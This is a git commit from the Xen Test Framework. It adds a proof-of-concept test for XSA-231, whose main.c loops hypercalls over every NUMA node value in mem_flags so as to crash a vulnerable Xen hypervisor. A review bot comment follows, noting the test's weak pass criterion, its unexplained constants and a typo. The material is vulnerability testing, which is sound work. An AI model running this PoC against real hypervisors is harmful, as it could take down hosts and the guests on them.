XSA-231 PoC
authorAndrew Cooper <andrew.cooper3@citrix.com>
Sun, 6 Aug 2017 10:39:51 +0000 (11:39 +0100)
committerAndrew Cooper <andrew.cooper3@citrix.com>
Mon, 25 Sep 2017 16:28:53 +0000 (17:28 +0100)
Based on an example provided by Matthew Daley.

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
docs/all-tests.dox
tests/xsa-231/Makefile [new file with mode: 0644]
tests/xsa-231/main.c [new file with mode: 0644]

index fba9b8f1de2e87cedba990465d81a3aecd63bc23..d53935872c24d098538988d421e80b414c78c6c9 100644 (file)
@@ -102,6 +102,8 @@ guest breakout.
 
 @subpage test-xsa-227 - x86: PV privilege escalation via map_grant_ref.
 
+@subpage test-xsa-231 - Missing NUMA node parameter verification.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-231/Makefile b/tests/xsa-231/Makefile
new file mode 100644 (file)
index 0000000..84ad33f
--- /dev/null
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-231
+CATEGORY  := xsa
+TEST-ENVS := pv64 hvm64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-231/main.c b/tests/xsa-231/main.c
new file mode 100644 (file)
index 0000000..2771beb
--- /dev/null
@@ -0,0 +1,46 @@
+/**
+ * @file tests/xsa-231/main.c
+ * @ref test-xsa-231
+ *
+ * @page test-xsa-231 XSA-231
+ *
+ * Advisory: [XSA-231](http://xenbits.xen.org/xsa/advisory-231.html)
+ *
+ * Before XSA-231, the node parameter in xen_memory_reservation was passed
+ * unaudited into the heap allocator, which ASSERT()ed it was range, then
+ * proceeded to write into an array bounded by MAX_NUMANODES.
+ *
+ * This test loops over all node values in the mem_flags field, and pokes Xen
+ * with each value.  If Xen is vulnerable, it will most likely crash.
+ *
+ * @see tests/xsa-231/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-231 PoC";
+
+void test_main(void)
+{
+    struct xen_memory_reservation res = {
+        .nr_extents = 1,
+        .domid = DOMID_SELF,
+    };
+
+    /* Opencoded loop over each value in the node field of mem_flags. */
+    for ( ; res.mem_flags < 0x10000; res.mem_flags += 0x100 )
+        hypercall_memory_op(XENMEM_increase_reservation, &res);
+
+    /* If Xen is alive at this point, it is probably not vulnerable. */
+
+    xtf_success("Success: Probably not vulnerable to XSA-231\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
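Review bot: The pass verdict at `xtf_success(...)` depends only on the guest still running after the loop, and the return value of `hypercall_memory_op()` in the loop body is discarded without comment. The header comment says the pre-fix path relied on an ASSERT() before the array write, so on a hypervisor built without assertions a vulnerable Xen might plausibly survive the loop and still be reported as a success; the `@page` text should state that limit, e.g. `A pass on a non-debug hypervisor is weak evidence; check the Xen console as well.` The loop constants are also unexplained, so I would add `/* node occupies bits 8-15 of mem_flags: step by 0x100 up to 0x10000 */` above the `for` and `/* Return value ignored: only hypervisor survival is tested. */` on the call. Separately, "ASSERT()ed it was range" in the header comment is missing the word "in".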